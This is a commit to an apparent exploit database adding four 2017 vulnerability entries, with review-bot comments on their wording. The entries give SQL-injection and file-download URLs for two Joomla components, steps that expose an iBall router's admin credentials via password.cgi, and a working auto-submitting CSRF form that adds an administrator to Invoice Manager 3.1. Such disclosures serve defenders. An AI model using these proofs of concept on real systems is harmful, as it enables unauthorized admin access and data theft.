DB: 2017-08-31
4 new exploits

Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection
Joomla! Component Joomanager 2.0.0 - Arbitrary File Download
iBall Baton 150M Wireless Router - Authentication Bypass
Invoice Manager 3.1 - Cross-Site Request Forgery (Add Admin)
parent 13819fd065
commit 6b9cb90c81
5 changed files with 202 additions and 0 deletions
|
@ -38373,3 +38373,7 @@ id,file,description,date,author,platform,type,port
|
|||
42584,platforms/php/webapps/42584.txt,"User Login and Management - Multiple Vulnerabilities",2017-08-29,"Ali BawazeEer",php,webapps,0
|
||||
42585,platforms/php/webapps/42585.txt,"PHP Video Battle Script 1.0 - SQL Injection",2017-08-28,"Ihsan Sencan",php,webapps,0
|
||||
42588,platforms/hardware/webapps/42588.txt,"Brickcom IP Camera - Credentials Disclosure",2017-08-29,"Emiliano Ipar",hardware,webapps,0
|
||||
42589,platforms/php/webapps/42589.txt,"Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection",2017-08-30,"Ihsan Sencan",php,webapps,0
|
||||
42590,platforms/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - Arbitrary File Download",2017-08-30,"Ihsan Sencan",php,webapps,0
|
||||
42591,platforms/php/webapps/42591.txt,"iBall Baton 150M Wireless Router - Authentication Bypass",2017-03-07,Indrajith.A.N,php,webapps,0
|
||||
42592,platforms/php/webapps/42592.html,"Invoice Manager 3.1 - Cross-Site Request Forgery (Add Admin)",2017-08-30,"Ali BawazeEer",php,webapps,0
|
||||
|
|
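Review bot: the added row for 42591 (iBall Baton 150M Wireless Router) is filed with platform `php` under platforms/php/webapps/, although the title describes a router; the Brickcom IP Camera row 42588 in the same hunk uses `hardware` and platforms/hardware/webapps/. Suggest moving the file to platforms/hardware/webapps/42591.txt and setting the platform column to hardware so the two device entries are classified the same way. The date column for that row is 2017-03-07 while the other three new rows carry 2017-08-30; it is worth confirming whether the column is meant to hold the advisory date or the date the entry was added.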
|
26
platforms/php/webapps/42589.txt
Executable file
|
@ -0,0 +1,26 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 30.08.2017
|
||||
# Vendor Homepage: http://joomplace.com/
|
||||
# Software Link: https://extensions.joomla.org/extensions/extension/living/education-a-culture/quiz-deluxe/
|
||||
# Demo: http://demo30.joomplace.com/our-products/joomla-quiz-deluxe
|
||||
# Version: 3.7.4
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: N/A
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/index.php?option=com_joomlaquiz&task=ajaxaction.flag_question&tmpl=component&stu_quiz_id=[SQL]
|
||||
# http://localhost/[PATH]/index.php?option=com_joomlaquiz&task=ajaxaction.flag_question&tmpl=component&flag_quest=[SQL]
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
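Review bot: the "# Description:" line says only that an attacker can "inject sql commands...." and the proof-of-concept section trails off with "Etc..", so the entry does not record whether the ajaxaction.flag_question task requires a logged-in session, whether releases other than 3.7.4 are affected, or whether the vendor was notified and a fixed version exists. Suggest replacing "Etc.." with those facts and stating in the description that the two parameters shown, stu_quiz_id and flag_quest, are the ones that reach the query, since that is what someone checking request logs or patching input handling needs to know.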
25
platforms/php/webapps/42590.txt
Executable file
|
@ -0,0 +1,25 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component Joomanager 2.0.0 - Arbitrary File Download
|
||||
# Dork: N/A
|
||||
# Date: 30.08.2017
|
||||
# Vendor Homepage: http://www.joomanager.com/
|
||||
# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/joomanager/
|
||||
# Demo: http://www.joomanager.com/demo/realestate
|
||||
# Version: 2.0.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: N/A
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The security obligation allows an attacker to arbitrary download files..
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# http://localhost/[PATH]/index.php?option=com_joomanager&controller=details&task=download&path=[FILE]
|
||||
#
|
||||
# Etc..
|
||||
# # # # #
|
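Review bot: the "# Description:" line reads "The security obligation allows an attacker to arbitrary download files..", which does not name the flaw; "security obligation" looks like a mistranslation of "vulnerability". Suggest rewording it to say that the path parameter of task=download on the details controller selects the file that is returned, and adding whether the request needs authentication and whether path is confined to any directory, none of which the entry currently states. As in 42589.txt, the closing "Etc.." should be dropped or replaced with the affected version range and fix status.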
74
platforms/php/webapps/42591.txt
Executable file
|
@ -0,0 +1,74 @@
|
|||
Title:
|
||||
====
|
||||
iball Baton 150M Wireless router - Authentication Bypass
|
||||
|
||||
Credit:
|
||||
======
|
||||
Name: Indrajith.A.N
|
||||
Website: https://www.indrajithan.com
|
||||
|
||||
Date:
|
||||
====
|
||||
07-03-2017
|
||||
|
||||
Vendor:
|
||||
======
|
||||
iball Envisioning the tremendous potential for innovative products required
|
||||
by the ever evolving users in computing and digital world, iBall was
|
||||
launched in September 2001 and which is one of the leading networking
|
||||
company
|
||||
|
||||
Product:
|
||||
=======
|
||||
iball Baton 150M Wireless-N ADSI.2+ Router
|
||||
|
||||
Product link:
|
||||
http://www.iball.co.in/Product/150M-Wireless-N-Broadband-Router/539
|
||||
|
||||
Abstract:
|
||||
=======
|
||||
iball Baton 150M Router's login page is insecurely developed that any
|
||||
attacker could bypass the admin's authentication just by tweaking the
|
||||
password.cgi file.
|
||||
|
||||
Affected Version:
|
||||
=============
|
||||
Firmware Version : 1.2.6 build 110401 Rel.47776n
|
||||
Hardware Version : iB-WRA150N v1 00000001
|
||||
|
||||
Exploitation-Technique:
|
||||
===================
|
||||
Remote
|
||||
|
||||
Severity Rating:
|
||||
===================
|
||||
9
|
||||
|
||||
Details:
|
||||
=======
|
||||
Any attacker can escalate his privilege to admin using this vulnerability.
|
||||
|
||||
Proof Of Concept:
|
||||
================
|
||||
1) Navigate to Routers Login page which is usually IPV4 default Gateway IP,
|
||||
i.e 172.20.174.1
|
||||
|
||||
2) Now just append password.cgi to the URL i.e
|
||||
http://172.20.174.1/password.cgi
|
||||
|
||||
3) Right-click and View Source code which disclsus the username, password
|
||||
and user role of the admin in the comment section
|
||||
|
||||
4) Successfully logged in using the disclosed credentials.
|
||||
|
||||
Reference:
|
||||
=========
|
||||
Video POC :
|
||||
https://drive.google.com/file/d/0B6715xUqH18MS1J5Sk13emFkQmc/view?usp=sharing
|
||||
|
||||
Disclosure Timeline:
|
||||
======================================
|
||||
Vendor Notification: March 5, 2017
|
||||
|
||||
-----
|
||||
Indrajith.A.N
|
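Review bot: the Title and Abstract call this an authentication bypass achieved "just by tweaking the password.cgi file", but steps 2 and 3 of the Proof Of Concept describe an unauthenticated request to password.cgi whose page source discloses the admin username, password and role in a comment; nothing is modified. Suggest describing it as credential disclosure via password.cgi, which also matches how the Brickcom entry 42588 in files.csv is titled. "Severity Rating: 9" is given without a scale, the Disclosure Timeline lists only "Vendor Notification: March 5, 2017" with no vendor response or fixed firmware, and "ADSI.2+" in the Product line looks like a typo worth checking against the vendor page.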
73
platforms/php/webapps/42592.html
Executable file
|
@ -0,0 +1,73 @@
|
|||
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
|
||||
|
||||
<!--
|
||||
# Exploit Title: Invoice Manager v3.1 - Cross site request forgery (Add Admin)
|
||||
# Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer
|
||||
# Dork: inurl:controller=pjAdmin
|
||||
# Date: 30.08.2017
|
||||
# Homepage: https://www.phpjabbers.com/invoice-manager/
|
||||
# Software Demo Link: http://demo.phpjabbers.com/1504048815_513/index.php?controller=pjAdmin&action=pjActionLogin
|
||||
# Version: 3.1
|
||||
# Category: Webapps /php
|
||||
# Tested on: mozila firefox
|
||||
#
|
||||
#
|
||||
-->
|
||||
|
||||
# ========================================================
|
||||
#
|
||||
#
|
||||
# Invoice Manager v3.1 Cross site request forgery (Add Admin)
|
||||
#
|
||||
# Description : Invoice Manager v3.1 is vulnerable to CSRF attack (No CSRF token in place) which if an admin user can be
|
||||
# tricked to visit a crafted URL created by attacker (via spear phishing/social engineering).
|
||||
# Once exploited, the attacker can login as the admin using the email and the password in the below exploit.
|
||||
#
|
||||
#
|
||||
# ======================CSRF POC (Adding New user with Administrator Privileges)==================================
|
||||
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<form name="csrf_form" action="http://localhost/invoice/index.php?controller=pjAdminUsers&action=pjActionCreate" method="post">
|
||||
|
||||
<input name="user_create" id="user_create" value="1" type="hidden">
|
||||
<input name="role_id" id="role_id" value="1" type="hidden" >
|
||||
<input name="email" id="email" value="AliBawazeEer@localhost.com" type="hidden">
|
||||
<input name="password" id="password" value="12341234" type="hidden">
|
||||
<input name="name" id="name" value="Ali BawazeEer" type="hidden">
|
||||
<input name="phone" id="phone" value="911911911" type="hidden">
|
||||
<input name="status" id="status" value="T" type="hidden">
|
||||
<script type="text/javascript">document.csrf_form.submit();</script>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
# =================================================EOF =======================================================
|
||||
#
|
||||
#
|
||||
# Risk : attackers are able to gain full access to the administrator panel after chaning the password for the admin
|
||||
# and thus have total control over the web application, including content change,and change user's account download backup of the site access to user's data..
|
||||
#
|
||||
#
|
||||
# Remedy : developer should implement CSRF token for each request
|
||||
#
|
||||
#
|
||||
#
|
||||
# ========================================================
|
||||
# [+] Disclaimer
|
||||
#
|
||||
# Permission is hereby granted for the redistribution of this advisory,
|
||||
# provided that it is not altered except by reformatting it, and that due
|
||||
# credit is given. Permission is explicitly given for insertion in
|
||||
# vulnerability databases and similar, provided that due credit is given to
|
||||
# the author. The author is not responsible for any misuse of the information contained
|
||||
# herein and prohibits any malicious use of all security related information
|
||||
# or exploits by the author or elsewhere.
|
||||
#
|
||||
#
|
||||
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
|
||||
|
||||
|
||||
|
||||
|
||||
|
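Review bot: the "# Risk" paragraph says access follows "after chaning the password for the admin", but the form above it posts to controller=pjAdminUsers&action=pjActionCreate with role_id=1, which creates a new user rather than changing an existing password; the Description and the section banner both say "Add Admin". Suggest rewording the Risk text to match. The file is added as .html, yet the leading row of "#" characters, the "# ====" description block and everything after </html> sit outside the <!-- --> comment, so they render as page text; moving all commentary inside the comment would keep the file well-formed. The Remedy line could also name the request that needs the token, the POST to pjActionCreate.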